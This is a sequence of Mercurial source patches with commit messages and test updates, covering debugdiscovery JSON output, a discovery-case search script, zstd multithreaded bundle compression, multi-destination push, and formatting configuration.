diff --git a/tests/test-completion.t b/tests/test-completion.t 
--- a/tests/test-completion.t +++ b/tests/test-completion.t @@ -283,7 +283,7 @@ debugdate: extended debugdeltachain: changelog, manifest, dir, template debugdirstate: nodates, dates, datesort - debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure + debugdiscovery: old, nonheads, rev, seed, local-as-revs, remote-as-revs, ssh, remotecmd, insecure, template debugdownload: output debugextensions: template debugfileset: rev, all-files, show-matcher, show-stage diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1724,3 +1724,45 @@ common: 300 missing: 100 common heads: 3ee37d65064a + +Test -T json output +------------------- + + $ hg -R a debugdiscovery \ + > -T json \ + > --debug \ + > --local-as-revs 'first(heads(all()), 25)' \ + > --remote-as-revs 'last(heads(all()), 25)' \ + > --config devel.discovery.randomize=false + query 1; heads + searching for changes + taking quick initial sample + query 2; still undecided: 375, sample size is: 81 + sampling from both directions + query 3; still undecided: 3, sample size is: 3 + 3 total queries in *s (glob) + [ + { + "elapsed": *, (glob) + "nb-common-heads": 1, + "nb-common-heads-both": 0, + "nb-common-heads-local": 0, + "nb-common-heads-remote": 0, + "nb-common-roots": 1, + "nb-head-local": 25, + "nb-head-local-missing": 25, + "nb-head-remote": 25, + "nb-head-remote-unknown": 25, + "nb-ini_und": 400, + "nb-ini_und-common": 300, + "nb-ini_und-heads": 25, + "nb-ini_und-missing": 100, + "nb-ini_und-roots": 1, + "nb-missing-heads": 25, + "nb-missing-roots": 25, + "nb-revs": 400, + "nb-revs-common": 300, + "nb-revs-missing": 100, + "total-roundtrips": 3 + } + ] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615824582 -3600 # Mon Mar 15 17:09:42 2021 +0100 # Node ID 67a2ecea8bd9dab2f28cb05b6c900de02eaf9837 # Parent 3a8cf5b9c8204aec5212d5aaf6263c66ce823a4b 
debugdiscovery: also integrate the discovery output in the json one We add a way for formatter to informs code that free output is unwanted, and we incorporate it in the json output. Differential Revision: https://phab.mercurial-scm.org/D10224 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -9,6 +9,7 @@ import codecs import collections +import contextlib import difflib import errno import glob @@ -1089,8 +1090,21 @@ remoterevs, _checkout = hg.addbranchrevs(repo, remote, branches, revs=None) localrevs = opts[b'rev'] - with util.timedcm('debug-discovery') as t: - common, hds = doit(localrevs, remoterevs) + + fm = ui.formatter(b'debugdiscovery', opts) + if fm.strict_format: + + @contextlib.contextmanager + def may_capture_output(): + ui.pushbuffer() + yield + data[b'output'] = ui.popbuffer() + + else: + may_capture_output = util.nullcontextmanager + with may_capture_output(): + with util.timedcm('debug-discovery') as t: + common, hds = doit(localrevs, remoterevs) # compute all statistics heads_common = set(common) @@ -1141,7 +1155,6 @@ data[b'nb-ini_und-common'] = len(common_initial_undecided) data[b'nb-ini_und-missing'] = len(missing_initial_undecided) - fm = ui.formatter(b'debugdiscovery', opts) fm.startitem() fm.data(**pycompat.strkwargs(data)) # display discovery summary diff --git a/mercurial/formatter.py b/mercurial/formatter.py --- a/mercurial/formatter.py +++ b/mercurial/formatter.py @@ -178,6 +178,11 @@ class baseformatter(object): + + # set to True if the formater output a strict format that does not support + # arbitrary output in the stream. 
+ strict_format = False + def __init__(self, ui, topic, opts, converter): self._ui = ui self._topic = topic @@ -418,6 +423,9 @@ class jsonformatter(baseformatter): + + strict_format = True + def __init__(self, ui, out, topic, opts): baseformatter.__init__(self, ui, topic, opts, _nullconverter) self._out = out diff --git a/tests/test-setdiscovery.t b/tests/test-setdiscovery.t --- a/tests/test-setdiscovery.t +++ b/tests/test-setdiscovery.t @@ -1734,13 +1734,6 @@ > --local-as-revs 'first(heads(all()), 25)' \ > --remote-as-revs 'last(heads(all()), 25)' \ > --config devel.discovery.randomize=false - query 1; heads - searching for changes - taking quick initial sample - query 2; still undecided: 375, sample size is: 81 - sampling from both directions - query 3; still undecided: 3, sample size is: 3 - 3 total queries in *s (glob) [ { "elapsed": *, (glob) @@ -1763,6 +1756,7 @@ "nb-revs": 400, "nb-revs-common": 300, "nb-revs-missing": 100, + "output": "query 1; heads\nsearching for changes\ntaking quick initial sample\nquery 2; still undecided: 375, sample size is: 81\nsampling from both directions\nquery 3; still undecided: 3, sample size is: 3\n3 total queries in *s\n", (glob) "total-roundtrips": 3 } ] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615884061 -3600 # Tue Mar 16 09:41:01 2021 +0100 # Node ID b6ac612445e05909f0ca5542e08040b57e126c2a # Parent 67a2ecea8bd9dab2f28cb05b6c900de02eaf9837 debugdiscovery: add missing byte string marker to some help text This is causing crash when using --help. 
Differential Revision: https://phab.mercurial-scm.org/D10227 diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -989,14 +989,14 @@ ( b'', b'local-as-revs', - "", - 'treat local has having these revisions only', + b"", + b'treat local has having these revisions only', ), ( b'', b'remote-as-revs', - "", - 'use local as remote, with only these these revisions', + b"", + b'use local as remote, with only these these revisions', ), ] + cmdutil.remoteopts # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615827702 -3600 # Mon Mar 15 18:01:42 2021 +0100 # Node ID 6b26e64325544f56d2089a7613e5be4ffb7318fc # Parent b6ac612445e05909f0ca5542e08040b57e126c2a perf-helpers: add a search-discovery-case script This a small script I built to look for interesting discovery case. It is fairly basic but could be useful in various situation so lets put it in the main repositories. Differential Revision: https://phab.mercurial-scm.org/D10225 diff --git a/contrib/perf-utils/search-discovery-case b/contrib/perf-utils/search-discovery-case new file mode 100755 --- /dev/null +++ b/contrib/perf-utils/search-discovery-case @@ -0,0 +1,198 @@ +#!/usr/bin/env python3 +# Search for interesting discovery instance +# +# search-discovery-case REPO [REPO]… +# +# This use a subsetmaker extension (next to this script) to generate a steam of +# random discovery instance. When interesting case are discovered, information +# about them are print on the stdout. 
+from __future__ import print_function + +import json +import os +import queue +import random +import signal +import subprocess +import sys +import threading + +this_script = os.path.abspath(sys.argv[0]) +this_dir = os.path.dirname(this_script) +hg_dir = os.path.join(this_dir, '..', '..') +HG_REPO = os.path.normpath(hg_dir) +HG_BIN = os.path.join(HG_REPO, 'hg') + +JOB = int(os.environ.get('NUMBER_OF_PROCESSORS', 8)) + + +SLICING = ('scratch', 'randomantichain', 'rev') + + +def nb_revs(repo_path): + cmd = [ + HG_BIN, + '--repository', + repo_path, + 'log', + '--template', + '{rev}', + '--rev', + 'tip', + ] + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return int(out) + + +repos = [] +for repo in sys.argv[1:]: + size = nb_revs(repo) + repos.append((repo, size)) + + +def pick_one(repo): + pick = random.choice(SLICING) + seed = random.randint(0, 100000) + if pick == 'scratch': + start = int(repo[1] * 0.3) + end = int(repo[1] * 0.7) + nb = random.randint(start, end) + return ('scratch', nb, seed) + elif pick == 'randomantichain': + return ('randomantichain', seed) + elif pick == 'rev': + start = int(repo[1] * 0.3) + end = int(repo[1]) + rev = random.randint(start, end) + return ('rev', rev) + else: + assert False + + +done = threading.Event() +cases = queue.Queue(maxsize=10 * JOB) +results = queue.Queue() + + +def worker(): + while not done.is_set(): + c = cases.get() + if c is None: + return + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + c = (c[0], c[2], c[1]) + try: + res = process(c) + results.put((c, res)) + except Exception as exc: + print('processing-failed: %s %s' % (c, exc), file=sys.stderr) + + +SUBSET_PATH = os.path.join(HG_REPO, 'contrib', 'perf-utils', 'subsetmaker.py') + + +CMD_BASE = ( + HG_BIN, + 'debugdiscovery', + '--template', + 'json', + '--config', + 'extensions.subset=%s' % SUBSET_PATH, +) +# '--local-as-revs "$left" 
--local-as-revs "$right"' +# > /data/discovery-references/results/disco-mozilla-unified-$1-$2.txt +# ) + + +def to_revsets(case): + t = case[0] + if t == 'scratch': + return 'not scratch(all(), %d, "%d")' % (case[1], case[2]) + elif t == 'randomantichain': + return '::randomantichain(all(), "%d")' % case[1] + elif t == 'rev': + return '::%d' % case[1] + else: + assert False + + +def process(case): + (repo, left, right) = case + cmd = list(CMD_BASE) + cmd.append('-R') + cmd.append(repo[0]) + cmd.append('--local-as-revs') + cmd.append(to_revsets(left)) + cmd.append('--remote-as-revs') + cmd.append(to_revsets(right)) + s = subprocess.Popen(cmd, stdout=subprocess.PIPE) + out, err = s.communicate() + return json.loads(out)[0] + + +def interesting_boundary(res): + """check if a case is interesting or not + + For now we are mostly interrested in case were we do multiple roundstrip + and where the boundary is somewhere in the middle of the undecided set. + + Ideally, we would make this configurable, but this is not a focus for now + + return None or (round-trip, undecided-common, undecided-missing) + """ + roundtrips = res["total-roundtrips"] + if roundtrips <= 1: + return None + undecided_common = res["nb-ini_und-common"] + undecided_missing = res["nb-ini_und-missing"] + if undecided_common == 0: + return None + if undecided_missing == 0: + return None + return (roundtrips, undecided_common, undecided_missing) + + +def end(*args, **kwargs): + done.set() + + +def format_case(case): + return '-'.join(str(s) for s in case) + + +signal.signal(signal.SIGINT, end) + +for i in range(JOB): + threading.Thread(target=worker).start() + +nb_cases = 0 +while not done.is_set(): + repo = random.choice(repos) + left = pick_one(repo) + right = pick_one(repo) + cases.put((repo, left, right)) + while not results.empty(): + # results has a single reader so this is fine + c, res = results.get_nowait() + boundary = interesting_boundary(res) + if boundary is not None: + print(c[0][0], 
format_case(c[1]), format_case(c[2]), *boundary) + sys.stdout.flush() + + nb_cases += 1 + if not nb_cases % 100: + print('[%d cases generated]' % nb_cases, file=sys.stderr) + +for i in range(JOB): + try: + cases.put_nowait(None) + except queue.Full: + pass + +print('[%d cases generated]' % nb_cases, file=sys.stderr) +print('[ouput generation is over]' % nb_cases, file=sys.stderr) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615895543 -3600 # Tue Mar 16 12:52:23 2021 +0100 # Node ID 63a3941d9847e954c086ff349c4ba7ecc71cfad1 # Parent 6b26e64325544f56d2089a7613e5be4ffb7318fc perf-util: add an helper revset to use the same spec as the case search script This make result of the searcher script easier to use. Differential Revision: https://phab.mercurial-scm.org/D10228 diff --git a/contrib/perf-utils/subsetmaker.py b/contrib/perf-utils/subsetmaker.py --- a/contrib/perf-utils/subsetmaker.py +++ b/contrib/perf-utils/subsetmaker.py @@ -18,6 +18,37 @@ revsetpredicate = registrar.revsetpredicate() +@revsetpredicate(b'subsetspec("<spec>")') +def subsetmarkerspec(repo, subset, x): + """use a shorthand spec as used by search-discovery-case + + Supported format are: + + - "scratch-count-seed": not scratch(all(), count, "seed") + - "randomantichain-seed": ::randomantichain(all(), "seed") + - "rev-REV": "::REV" + """ + args = revsetlang.getargs( + x, 0, 1, _(b'subsetspec("spec") required an argument') + ) + + spec = revsetlang.getstring(args[0], _(b"spec should be a string")) + case = spec.split(b'-') + t = case[0] + if t == b'scratch': + spec_revset = b'not scratch(all(), %s, "%s")' % (case[1], case[2]) + elif t == b'randomantichain': + spec_revset = b'::randomantichain(all(), "%s")' % case[1] + elif t == b'rev': + spec_revset = b'::%d' % case[1] + else: + assert False, spec + + selected = repo.revs(spec_revset) + + return selected & subset + + @revsetpredicate(b'scratch(REVS, <count>, [seed])') def scratch(repo, subset, x): """randomly 
remove <count> revision from the repository top # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845124 18000 # Tue Dec 01 12:52:04 2020 -0500 # Node ID d13afdd1f6e25282f68a62c6ffa7b407a4ab2fec # Parent 63a3941d9847e954c086ff349c4ba7ecc71cfad1 pyproject: add config file This will tell pip et al to call our setup.py for the majority of packaging concerns, but also gives us a place to put standard config stuff like black. This was previously D9833, but was rolled back due to test breakage. nbjoerg thinks that breakage is now resolved, so we're trying again. Differential Revision: https://phab.mercurial-scm.org/D10184 diff --git a/pyproject.toml b/pyproject.toml new file mode 100644 --- /dev/null +++ b/pyproject.toml @@ -0,0 +1,3 @@ +[build-system] +requires = ["setuptools", "wheel"] +build-backend = "setuptools.build_meta" diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -70,6 +70,7 @@ hg hgeditor hgweb.cgi + pyproject.toml rustfmt.toml setup.py # HG changeset patch # User Augie Fackler <augie@google.com> # Date 1606845573 18000 # Tue Dec 01 12:59:33 2020 -0500 # Node ID decc3bd3f20d5628a0dd6c49394c00e51d1abe60 # Parent d13afdd1f6e25282f68a62c6ffa7b407a4ab2fec black: merge config into main pyproject.toml now that we have it This means that naive contributors who just run `black` on a source file will get reasonable behavior as long as they have a recent black. Yay! This was previously D9834 but was rolled back due to test failures. nbjoerg thinks it's time to try again, so let's give it a shot. 
Differential Revision: https://phab.mercurial-scm.org/D10185 diff --git a/black.toml b/black.toml deleted file mode 100644 --- a/black.toml +++ /dev/null @@ -1,14 +0,0 @@ -[tool.black] -line-length = 80 -exclude = ''' -build/ -| wheelhouse/ -| dist/ -| packages/ -| \.hg/ -| \.mypy_cache/ -| \.venv/ -| mercurial/thirdparty/ -''' -skip-string-normalization = true -quiet = true diff --git a/contrib/examples/fix.hgrc b/contrib/examples/fix.hgrc --- a/contrib/examples/fix.hgrc +++ b/contrib/examples/fix.hgrc @@ -5,7 +5,7 @@ rustfmt:command = rustfmt +nightly rustfmt:pattern = set:"**.rs" - "mercurial/thirdparty/**" -black:command = black --config=black.toml - +black:command = black black:pattern = set:**.py - mercurial/thirdparty/** # Mercurial doesn't have any Go code, but if we did this is how we diff --git a/pyproject.toml b/pyproject.toml --- a/pyproject.toml +++ b/pyproject.toml @@ -1,3 +1,18 @@ [build-system] requires = ["setuptools", "wheel"] build-backend = "setuptools.build_meta" + +[tool.black] +line-length = 80 +exclude = ''' +build/ +| wheelhouse/ +| dist/ +| packages/ +| \.hg/ +| \.mypy_cache/ +| \.venv/ +| mercurial/thirdparty/ +''' +skip-string-normalization = true +quiet = true diff --git a/tests/test-check-code.t b/tests/test-check-code.t --- a/tests/test-check-code.t +++ b/tests/test-check-code.t @@ -66,7 +66,6 @@ COPYING Makefile README.rst - black.toml hg hgeditor hgweb.cgi diff --git a/tests/test-check-format.t b/tests/test-check-format.t --- a/tests/test-check-format.t +++ b/tests/test-check-format.t @@ -1,5 +1,5 @@ #require black test-repo $ cd $RUNTESTDIR/.. 
- $ black --config=black.toml --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` + $ black --check --diff `hg files 'set:(**.py + grep("^#!.*python")) - mercurial/thirdparty/**'` # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615622343 -3600 # Sat Mar 13 08:59:03 2021 +0100 # Node ID c94fa884240bb084f7ff23b55973b0a4c5c9b65f # Parent decc3bd3f20d5628a0dd6c49394c00e51d1abe60 rust: Preallocate the returned `Vec` in `utils::files::relativize_path` Profiling `rhg files > /dev/null` on an old snapshot of mozilla-central (with `perf` and the Firefox Profiler: https://github.com/firefox-devtools/profiler/blob/main/docs-user/guide-perf-profiling.md) showed non-trivial time spend in this function and in `realloc`. This change makes the wall-clock time for that process on my machine go from ~190 ms to ~150 ms. Differential Revision: https://phab.mercurial-scm.org/D10199 diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -290,7 +290,13 @@ if cwd.as_ref().is_empty() { Cow::Borrowed(path.as_bytes()) } else { - let mut res: Vec<u8> = Vec::new(); + // This is not all accurate as to how large `res` will actually be, but + // profiling `rhg files` on a large-ish repo shows it’s better than + // starting from a zero-capacity `Vec` and letting `extend` reallocate + // repeatedly. 
+ let guesstimate = path.as_bytes().len(); + + let mut res: Vec<u8> = Vec::with_capacity(guesstimate); let mut path_iter = path.as_bytes().split(|b| *b == b'/').peekable(); let mut cwd_iter = cwd.as_ref().as_bytes().split(|b| *b == b'/').peekable(); # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1604863029 -3600 # Sun Nov 08 20:17:09 2020 +0100 # Node ID 471cd86c8eb4ec611ed89ad570b7219e2611b3eb # Parent c94fa884240bb084f7ff23b55973b0a4c5c9b65f bundle: optional multithreaded compression, ATM zstd-only Compression type can be a huge chunk of "hg bundle", especially when using the higher compression levels. With level=22 and threads=7, the NetBSD test repository took 28:39 wall time and 157:47 user time. Before, level=22 would take 129:20 wall time and 129:07 user time. Differential Revision: https://phab.mercurial-scm.org/D9283 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -1648,6 +1648,14 @@ if complevel is not None: compopts[b'level'] = complevel + compthreads = ui.configint( + b'experimental', b'bundlecompthreads.' + bundlespec.compression + ) + if compthreads is None: + compthreads = ui.configint(b'experimental', b'bundlecompthreads') + if compthreads is not None: + compopts[b'threads'] = compthreads + # Bundling of obsmarker and phases is optional as not all clients # support the necessary features. 
cfg = ui.configbool diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -866,6 +866,31 @@ ) coreconfigitem( b'experimental', + b'bundlecompthreads', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.bzip2', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.gzip', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.none', + default=None, +) +coreconfigitem( + b'experimental', + b'bundlecompthreads.zstd', + default=None, +) +coreconfigitem( + b'experimental', b'changegroup3', default=False, ) diff --git a/mercurial/utils/compression.py b/mercurial/utils/compression.py --- a/mercurial/utils/compression.py +++ b/mercurial/utils/compression.py @@ -685,9 +685,11 @@ # while providing no worse compression. It strikes a good balance # between speed and compression. level = opts.get(b'level', 3) + # default to single-threaded compression + threads = opts.get(b'threads', 0) zstd = self._module - z = zstd.ZstdCompressor(level=level).compressobj() + z = zstd.ZstdCompressor(level=level, threads=threads).compressobj() for chunk in it: data = z.compress(chunk) if data: diff --git a/relnotes/next b/relnotes/next --- a/relnotes/next +++ b/relnotes/next @@ -5,6 +5,11 @@ * The `rev-branch-cache` is now updated incrementally whenever changesets are added. + * The new options `experimental.bundlecompthreads` and + `experimental.bundlecompthreads.<engine>` can be used to instruct + the compression engines for bundle operations to use multiple threads + for compression. The default is single threaded operation. Currently + only supported for zstd. 
== New Experimental Features == diff --git a/tests/test-bundle-type.t b/tests/test-bundle-type.t --- a/tests/test-bundle-type.t +++ b/tests/test-bundle-type.t @@ -201,6 +201,15 @@ (see 'hg help bundlespec' for supported values for --type) [10] +zstd supports threading + + $ hg init test-compthreads + $ cd test-compthreads + $ hg debugbuilddag +3 + $ hg --config experimental.bundlecompthreads=1 bundle -a -t zstd-v2 zstd-v2-threaded.hg + 3 changesets found + $ cd .. + #else zstd is a valid engine but isn't available # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615990845 -3600 # Wed Mar 17 15:20:45 2021 +0100 # Node ID 25850879a215ee9cb8beea17eaddbfd737058837 # Parent 471cd86c8eb4ec611ed89ad570b7219e2611b3eb push: indent the some part of the command That code will be put in a loop in the next changeset, pre-indenting make the next change clearer. Differential Revision: https://phab.mercurial-scm.org/D10160 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5706,80 +5706,84 @@ # if we try to push a deleted bookmark, translate it to null # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - - path = ui.getpath(dest, default=(b'default-push', b'default')) - if not path: - raise error.ConfigError( - _(b'default repository not configured!'), - hint=_(b"see 'hg help config.paths'"), - ) - dest = path.pushloc or path.loc - branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) - revs, checkout = hg.addbranchrevs(repo, repo, branches, opts.get(b'rev')) - other = hg.peer(repo, opts, dest) - - try: - if revs: - revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] - if not revs: - raise error.InputError( - _(b"specified revisions evaluate to an empty set"), - hint=_(b"use different revision arguments"), - ) - elif path.pushrev: - # It doesn't make any sense 
to specify ancestor revisions. So limit - # to DAG heads to make discovery simpler. - expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) - revs = scmutil.revrange(repo, [expr]) - revs = [repo[rev].node() for rev in revs] - if not revs: - raise error.InputError( - _(b'default push revset for path evaluates to an empty set') - ) - elif ui.configbool(b'commands', b'push.require-revs'): - raise error.InputError( - _(b'no revisions specified to push'), - hint=_(b'did you mean "hg push -r ."?'), + if True: + path = ui.getpath(dest, default=(b'default-push', b'default')) + if not path: + raise error.ConfigError( + _(b'default repository not configured!'), + hint=_(b"see 'hg help config.paths'"), ) - - repo._subtoppath = dest + dest = path.pushloc or path.loc + branches = (path.branch, opts.get(b'branch') or []) + ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) + revs, checkout = hg.addbranchrevs( + repo, repo, branches, opts.get(b'rev') + ) + other = hg.peer(repo, opts, dest) + try: - # push subrepos depth-first for coherent ordering - c = repo[b'.'] - subs = c.substate # only repos that are committed - for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result + if revs: + revs = [repo[r].node() for r in scmutil.revrange(repo, revs)] + if not revs: + raise error.InputError( + _(b"specified revisions evaluate to an empty set"), + hint=_(b"use different revision arguments"), + ) + elif path.pushrev: + # It doesn't make any sense to specify ancestor revisions. So limit + # to DAG heads to make discovery simpler. 
+ expr = revsetlang.formatspec(b'heads(%r)', path.pushrev) + revs = scmutil.revrange(repo, [expr]) + revs = [repo[rev].node() for rev in revs] + if not revs: + raise error.InputError( + _( + b'default push revset for path evaluates to an empty set' + ) + ) + elif ui.configbool(b'commands', b'push.require-revs'): + raise error.InputError( + _(b'no revisions specified to push'), + hint=_(b'did you mean "hg push -r ."?'), + ) + + repo._subtoppath = dest + try: + # push subrepos depth-first for coherent ordering + c = repo[b'.'] + subs = c.substate # only repos that are committed + for s in sorted(subs): + result = c.sub(s).push(opts) + if result == 0: + return not result + finally: + del repo._subtoppath + + opargs = dict( + opts.get(b'opargs', {}) + ) # copy opargs since we may mutate it + opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) + + pushop = exchange.push( + repo, + other, + opts.get(b'force'), + revs=revs, + newbranch=opts.get(b'new_branch'), + bookmarks=opts.get(b'bookmark', ()), + publish=opts.get(b'publish'), + opargs=opargs, + ) + + result = not pushop.cgresult + + if pushop.bkresult is not None: + if pushop.bkresult == 2: + result = 2 + elif not result and pushop.bkresult: + result = 2 finally: - del repo._subtoppath - - opargs = dict( - opts.get(b'opargs', {}) - ) # copy opargs since we may mutate it - opargs.setdefault(b'pushvars', []).extend(opts.get(b'pushvars', [])) - - pushop = exchange.push( - repo, - other, - opts.get(b'force'), - revs=revs, - newbranch=opts.get(b'new_branch'), - bookmarks=opts.get(b'bookmark', ()), - publish=opts.get(b'publish'), - opargs=opargs, - ) - - result = not pushop.cgresult - - if pushop.bkresult is not None: - if pushop.bkresult == 2: - result = 2 - elif not result and pushop.bkresult: - result = 2 - finally: - other.close() + other.close() return result # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615351820 -3600 # Wed Mar 10 05:50:20 2021 +0100 # Node ID 
066b8d8f75b873ecd1b8a1c4633c4a121c95d57d # Parent 25850879a215ee9cb8beea17eaddbfd737058837 push: allow to specify multiple destinations I end up needing that on a regular basis and it turn out to be very simple to implement. See documentation and test for details. Differential Revision: https://phab.mercurial-scm.org/D10161 diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -5623,11 +5623,11 @@ ), ] + remoteopts, - _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]'), + _(b'[-f] [-r REV]... [-e CMD] [--remotecmd CMD] [DEST]...'), helpcategory=command.CATEGORY_REMOTE_REPO_MANAGEMENT, helpbasic=True, ) -def push(ui, repo, dest=None, **opts): +def push(ui, repo, *dests, **opts): """push changes to the specified destination Push changesets from the local repository to the specified @@ -5663,6 +5663,9 @@ Please see :hg:`help urls` for important details about ``ssh://`` URLs. If DESTINATION is omitted, a default path will be used. + When passed multiple destinations, push will process them one after the + other, but stop should an error occur. + .. 
container:: verbose The --pushvars option sends strings to the server that become @@ -5706,7 +5709,12 @@ # if we try to push a deleted bookmark, translate it to null # this lets simultaneous -r, -b options continue working opts.setdefault(b'rev', []).append(b"null") - if True: + + if not dests: + dests = [None] + some_pushed = False + result = 0 + for dest in dests: path = ui.getpath(dest, default=(b'default-push', b'default')) if not path: raise error.ConfigError( @@ -5753,9 +5761,9 @@ c = repo[b'.'] subs = c.substate # only repos that are committed for s in sorted(subs): - result = c.sub(s).push(opts) - if result == 0: - return not result + sub_result = c.sub(s).push(opts) + if sub_result == 0: + return 1 finally: del repo._subtoppath @@ -5775,15 +5783,24 @@ opargs=opargs, ) - result = not pushop.cgresult + if pushop.cgresult == 0: + result = 1 + elif pushop.cgresult is not None: + some_pushed = True if pushop.bkresult is not None: if pushop.bkresult == 2: result = 2 elif not result and pushop.bkresult: result = 2 + + if result: + break + finally: other.close() + if result == 0 and not some_pushed: + result = 1 return result diff --git a/tests/test-exchange-multi-source.t b/tests/test-exchange-multi-source.t --- a/tests/test-exchange-multi-source.t +++ b/tests/test-exchange-multi-source.t @@ -71,6 +71,9 @@ Test simple bare operation ========================== +pull +---- + $ hg clone main-repo test-repo-bare --rev 0 -U adding changesets adding manifests @@ -121,9 +124,90 @@ o A 0 +push +---- + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 3 changesets with 3 changes to 3 files (+2 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file 
changes + added 4 changesets with 4 changes to 4 files (+2 heads) + pushing to ./branch-H-push + searching for changes + adding changesets + adding manifests + adding file changes + added 4 changesets with 4 changes to 4 files (+2 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + | o G 6 + | | + | o F 5 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 7 + | + | o E 6 + | | + | o D 5 + |/ + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o G 7 + | + o F 6 + | + | o E 5 + | | + | o D 4 + | | + | | o H 3 + | |/ + | o C 2 + |/ + o B 1 + | + o A 0 + + $ rm -rf ./*-push + Test operation with a target ============================ +pull +---- + $ hg clone main-repo test-repo-rev --rev 0 -U adding changesets adding manifests @@ -199,6 +283,125 @@ o A 0 +push +---- + +We only push a specific branch with --rev + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg push --force -R test-repo-bare ./branch-E-push ./branch-G-push ./branch-H-push --rev default + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 
+ | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + +Same push, but the first one is a no-op + + $ cp -R ./branch-E ./branch-E-push + $ cp -R ./branch-G ./branch-G-push + $ cp -R ./branch-H ./branch-H-push + $ hg push --force -R test-repo-bare ./branch-G-push ./branch-H-push ./branch-E-push --rev default + pushing to ./branch-G-push + searching for changes + adding changesets + adding manifests + adding file changes + added 2 changesets with 2 changes to 2 files (+1 heads) + pushing to ./branch-H-push + searching for changes + no changes found + pushing to ./branch-E-push + searching for changes + adding changesets + adding manifests + adding file changes + added 1 changesets with 1 changes to 1 files (+1 heads) + $ hg log -R ./branch-E-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + | o E 4 + | | + | o D 3 + |/ + o C 2 + | + o B 1 + | + o A 0 + + $ hg log -R ./branch-G-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 5 + | + o C 4 + | + | o G 3 + | | + | o F 2 + |/ + o B 1 + | + o A 0 + + $ hg log -R ./branch-H-push -T '{desc} {rev}\n' --rev 'sort(all(), "topo")' -G + o H 3 + | + o C 2 + | + o B 1 + | + o A 0 + + $ rm -rf ./*-push + Test with --update ================== # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1615396161 -3600 # Wed Mar 10 18:09:21 2021 +0100 # Node ID 